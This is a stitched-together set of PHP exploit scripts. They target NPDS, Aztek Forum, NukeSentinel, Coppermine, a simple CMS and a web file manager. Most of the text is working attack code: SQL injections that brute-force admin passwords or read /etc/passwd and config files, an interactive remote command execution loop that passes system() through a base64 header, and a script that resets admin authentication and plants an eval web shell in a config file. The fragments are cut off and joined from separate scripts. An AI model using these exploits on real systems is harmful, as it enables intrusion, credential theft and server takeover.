function main() { // :) $web = new phpsploit(); $web->agent('Mozilla Firefox'); // Hey ya :) head(); // Target $url = get_p('url', true); // Proxy options $prh = get_p('proxhost'); $pra = get_p('proxauth'); // Use a proxy ? if ($prh) { // host:ip $web->proxy($prh); // Authentication if ($pra) { $web->proxyauth($pra); } } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5(rand(0, 1000000000) . 'HEY_YA'); $c_sep = "print('{$s_sep}');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while (($cmd = cmd_prompt()) !== false) { // magic_quotes_gpc bypass $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");')); // Go =] $web->get($url . 'index.php?fields=' . to_char($final) . ',1'); // Result $res = explode($s_sep, $web->getcontent()); // Erf if (!isset($res[1])) { print "\nFailed"; exit(1); } else { if (empty($res[1])) { print "\nNo output: system() disabled OR cmd failed OR cmd without output"; } else { print "\n" . $res[1]; } } } return; }
#!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); # Advisory soon if ($argc < 3) { print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n"; exit(1); } $url = getparam('url', 1); $pro = getparam('proxy'); $pra = getparam('proyauth'); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); if ($pro) { $xpl->proxy($pro); } if ($pra) { $xpl->proxyauth($pra); } # +print.php (SQL INJECTION) # | # 124. } elseif (!empty($lid)) { # 125. settype ($lid, "integer"); # 126. PrintPage("links",$DB, $lid); # # 30. if ($oper=="links") { # 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'"); # 32. list($url, $title, $description, $time)=mysql_fetch_row($result); # 40. if ($DB) { # 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents()))); #
+-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums") ---[ CODE ./index/common_actions.php ------------------------------------ $file = $_FILES['upload']['tmp_name']; ... if(@copy($file,$path_file)) $avatar=$path_file; ------------------------------------ | +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =). */ $url = $argv[1]; $prs = $argv[2]; $pra = $argv[3]; $xpl = new phpsploit(); if (!empty($prs)) { $xpl->proxy($prs); } if (!empty($pra)) { $xpl->proxyauth($pra); } print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit"; print "\nheader> =================================================="; if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) { print "\nsploit> Owner -> " . $matches[1]; } else { die("\nsploit> Exploit failed"); } $owner = $matches[1]; print "\nstatus> Trying to register a new user"; $xpl->cookiejar(1); $xpl->allowredirection(1);
if ($argc < 3) { print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n"; exit(1); } $url = getparam("url", 1); $tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke'; $debug = getparam("debug") != "" ? 1 : 0; $benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000'; $proxy = getparam("proxy"); $proxyauth = getparam("proxyauth"); $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(0); $xpl->cookiejar(0); if ($proxy) { $xpl->proxy($proxy); } if ($proxyauth) { $xpl->proxyauth($proxyauth); } if ($debug) { debug(1); } print "\nUsername: "******"\nPassword: "; bruteforce('pwd'); exit(0); function bruteforce($field) { global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
/*/ $url = $argv[1]; $adu = $argv[2]; $adp = $argv[3]; $pxs = $argv[4]; $pxa = $argv[5]; $xpl = new phpsploit(); $xpl->agent("InternetExploiter"); $xpl->cookiejar(1); $xpl->allowredirection(1); print "\nheader> ==============================================="; print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)"; print "\nheader> ==============================================="; if (!empty($pxs)) { print "\nstatus> Using a proxy {$pxs}"; $xpl->proxy($pxs); } if (!empty($pxa)) { print "\nstatus> Basic proxy authentification {$pxa}"; $xpl->proxyauth($pxa); } /*/ Table prefix. /*/ print "\nstatus> Searching the version"; $xpl->get($url . 'include/index.html'); if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) { print "\nsploit> Coppermine version " . $matches[1]; } else { print "\nsploit> Not found"; }
#!/usr/bin/php <?php if ($argc < 3) { print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n"; exit(1); } $url = $argv[1]; $file = $argv[2]; $proxh = $argv[3]; $proxa = $argv[4]; $xpl = new phpsploit(); $xpl->agent("Mozilla"); if ($proxh) { $xpl->proxy($proxh); } if ($proxa) { $xpl->proxyauth($proxa); } /* * $id = $_GET['id']; * $query = "SELECT * from content WHERE id = $id"; * ... * @return $row->text; * * Simple SQL injection (register_globals=off ; magic_quotes_gpc=on). * What we want is not in the database, it's in a file (config.php): * * //this are the logins for the admin part. Change them for security. * $login = "******"; //your login for the admin section. * $pass = "******"; //your login for the admin section. *
<?php error_reporting(E_ALL ^ E_NOTICE); head(); if ($argc < 3) { usage(); } $url = getparam('url', true); $prx = getparam('proxy', false); $pra = getparam('proxyauth', false); $cod = 'eval($_SERVER[HTTP_SHELL]);'; $xpl = new phpsploit(); $xpl->agent('Mozilla Firefox'); $xpl->allowredirection(1); $xpl->cookiejar(1); if ($prx) { $xpl->proxy($prx); } if ($pra) { $xpl->proxyauth($pra); } print "0x01>Deleting the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1'); print "\n0x02>Creating the file auth.inc.php"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); print "\n0x03>Trying to log in as Administrator"; $xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor'); // Minimum data necessary (fwrite without quote) $minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1'; print "\n0x04>Creating the file config.inc.php"; $xpl->post($url . 'dirsys/modules/config/post.php', $minimdata); print "\n0x05>Now enter your commands";